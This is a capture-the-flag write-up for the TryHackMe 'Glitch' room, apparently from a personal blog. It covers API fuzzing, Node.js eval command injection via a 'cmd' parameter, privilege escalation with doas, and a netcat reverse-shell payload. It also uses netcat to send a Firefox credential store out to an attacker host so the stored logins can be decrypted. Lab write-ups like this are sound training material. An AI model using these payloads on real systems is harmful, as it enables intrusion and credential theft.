TryHackMe — Glitch

Hafiq Iqmal

Apr 6·5 min read

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Glitch challenge.

Room: https://tryhackme.com/room/glitch
Level: Easy

Task: Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

Lets get started

As usual, start the machine and open the IP in browser (took like 10 minutes to appear. I don’t know why)

Just a blank page with glitch wallpaper. When open the console, there is an api endpoint. Let’s open it in browser

Oh!, there is a token. But, that’s not the answer. Looks like base64. Using cyberchef,

First flag done!. Move on… Continue to investigate…

From the request, there is Cookie default as token=value. Lets change it

document.cookie="token=**************"

and refresh the page. Seems like not changing.. Try POST

# curl -X POST http://10.10.82.X/api/access --cookie "token=**************"<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot POST /api/access</pre>
</body>
</html>

Never mind. Just run feroxbuster from /api

# feroxbuster — url http://10.10.82.X/api -w ~/dirb/big.txt -t 20 🎯 Target Url      │ http://10.10.82.X/api
 🚀 Threads         │ 20
 📖 Wordlist        │ ~/dirb/big.txt
 👌 Status Codes    │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 💥 Timeout (secs)  │ 7
 🦡 User-Agent      │ feroxbuster/2.2.3
 💉 Config File     │ /usr/local/bin/ferox-config.toml
 🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
 🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 1l 1w 36c http://10.10.82.X/api/access
200 1l 1w 169c http://10.10.82.X/api/items
[####################] — 3m 20468/20468 0s found:2 errors:0 
[####################] — 3m 20468/20468 101/s http://10.10.82.X/api

Found another hidden endpoint. /api/items

# curl -X GET http://10.10.82.X/api/items{"sins":["lust","gluttony","greed","sloth","wrath","envy","pride"],"errors":["error","error","error","error","error","error","error","error","error"],"deaths":["death"]}

Hmm.. don’t know what that means. By this point, cookie is not mandatory anymore. Maybe there is a glitch in the system. Hehe.. Btw, continue try using POST,

# curl -X POST http://10.10.82.X/api/items
{"message":"there_is_a_glitch_in_the_matrix"}

There is a message. There must be some hidden from here. Hidden parameter maybe? Faster way to check by using Arjun,

# arjun -u http://10.10.7.149/api/items -m POST -w ~/wordlists/wfuzz/general/common.txt
Probing the target for stability
Analysing HTTP response for anamolies
Analysing HTTP response for potential parameter names
Logicforcing the URL endpoint

No result, hmmm. Need to use WFuzz i think. Running wfuzz using same dict…

# wfuzz -z file,wordlists/wfuzz/general/common.txt -c -d "testing" --hc 400,401,403,404 http://10.10.X.X/api/items\?FUZZ\=testing
Target: http://10.10.X.X/api/items?FUZZ=testing
Total requests: 950====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                              
====================================================================
000000201:   500        10 L     64 W       1084 Ch     "cmd"

“CMD” okay.. there is parameter called cmd which give changes the page response. Let’s see

# curl -X POST http://10.10.X.X/api/items?cmd=test
....
.... 
<pre>ReferenceError: test is not defined<br> &nbsp; &nbsp;at eval (eval at router.post (/var/web/routes/api.js:25:60)
....

Okay…, let’s test if can be reverse shell. Referring to this github,

require('child_process').exec('nc -e /bin/sh YOUR_IP 1234')

Run nc -nvlp 1234 first. Then try using this,

# curl -X POST -G http://10.10.X.X/api/items --data-urlencode "cmd=require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 1234 >/tmp/f')"vulnerability_exploited [object Object]

The message detect vulnerability and luckily reverse shell is working

Connection from 10.10.X.X:55038
/bin/sh: 0: can’t access tty; job control turned off
$

First thing first, upgrade the terminal first,

# python -c 'import pty; pty.spawn("/bin/bash")'

Now, hunt the user.txt file

# ls -al ~/
drwxr-xr-x   8 user user  4096 Jan 27 10:33 .
drwxr-xr-x   4 root root  4096 Jan 15 14:13 ..
-rw-rw-r--   1 user user    22 Jan  4 15:29 user.txt# cat ~/user.txt
THM{XXXXXXXXXXXXXXXXX}

Ok now, Root!

From the same directory

# ls -al
lrwxrwxrwx   1 root root      9 Jan 21 09:05 .bash_history -> /dev/null
-rw-r--r--   1 user user   3771 Apr  4  2018 .bashrc
drwx------   2 user user   4096 Jan  4 13:41 .cache
drwxrwxrwx   4 user user   4096 Jan 27 10:32 .firefox
drwx------   3 user user   4096 Jan  4 13:41 .gnupg
drwxr-xr-x 270 user user  12288 Jan  4 14:07 .npm
drwxrwxr-x   5 user user   4096 Apr  6 06:08 .pm2
drwx------   2 user user   4096 Jan 21 08:47 .ssh
-rw-rw-r--   1 user user     22 Jan  4 15:29 user.txt

There is full permission for folder .firefox.

# ls -al .firefox
drwxrwxrwx 11 user user 4096 Jan 27 10:32  b5w4643p.default-release
drwxrwxrwx  3 user user 4096 Jan 27 10:32 'Crash Reports'
-rwxrwxr-x  1 user user  259 Jan 27 10:32  profiles.ini

Its actually a firefox storage which contains sensitive information here. Drill down, found b5w4643p.default-release/login.json

{"nextId":2,"logins":[{"id":1,"hostname":"https://glitch.thm","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCP5HBZJq0+DBAjWdWrk7qo4eA==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPfxo08d5UxEBBB9aJ+chJC2pDccxKhqs1UH","guid":"{9c80e9f2-0377-496e-9404-4411eb94783b}","encType":1,"timeCreated":1610645982812,"timeLastUsed":1610645982812,"timePasswordChanged":1610645982812,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}

Everything is encrypted. Search for the Decrypter, and found this repo. Buttt, unable to git clone inside this victim machine. Sooo, we can use netcat to download this firefox folder. Zip first

# tar -czvf firefox.tar.gz .firefox

Ok now from victim machine, run this netcat command

# nc YOUR_IP 4444 -w 3 < ~/firefox.tar.g

And from local, listen

# nc -lvp 4444 > ~/Downloads/firefox.tar.gz
Connection from 10.10.X.X:60726

Ok its successfully downloaded. Extract it and run the firefox decrypter.

# python3 firefox_decrypt.py ~/Downloads/.firefox             
Select the Mozilla profile you wish to decrypt
1 -> hknqkrn7.default
2 -> b5w4643p.default-release
2Website:   https://glitch.thm
Username: 'v0id'
Password: 'XXXXXXXXXXXX'

Oh! That’s fast. Let’s use as SSH to login as v0id user

# ssh v0id@10.10.7.149
ssh: connect to host 10.10.7.149 port 22: Operation timed out

Okay, ssh not possible, then try su from inside the victim machine

# su v0id
password: XXXXXXXXXXXv0id@ubuntu:~$

Success! Its working…

# ls /root
ls: cannot open directory '/root': Permission denied# sudo -l
password: 
Sorry, user v0id may not run sudo on ubuntu.

Let’s see the hint and it says “ sudo is bloat.” Try to google search and first entry said “Sudo Is Bloat. Use Doas Instead!”. Then, I type the doas command

v0id@ubuntu:/home/user$ doasusage: doas [-nSs] [-a style] [-C config] [-u user] command [args]

Its accept command argument. Let’s try if it can access root folder

# doas ls /root
password: XXXXXXXXXXXXXclean.sh  root.txt

Haha! Simply can cat command the file then

# doas cat /root/root.txt
password: XXXXXXXXXXXXXXTHM{XXXXXXXXXXXXXXXXXXXX}

Done!!!

~~~Happy Hacking~~~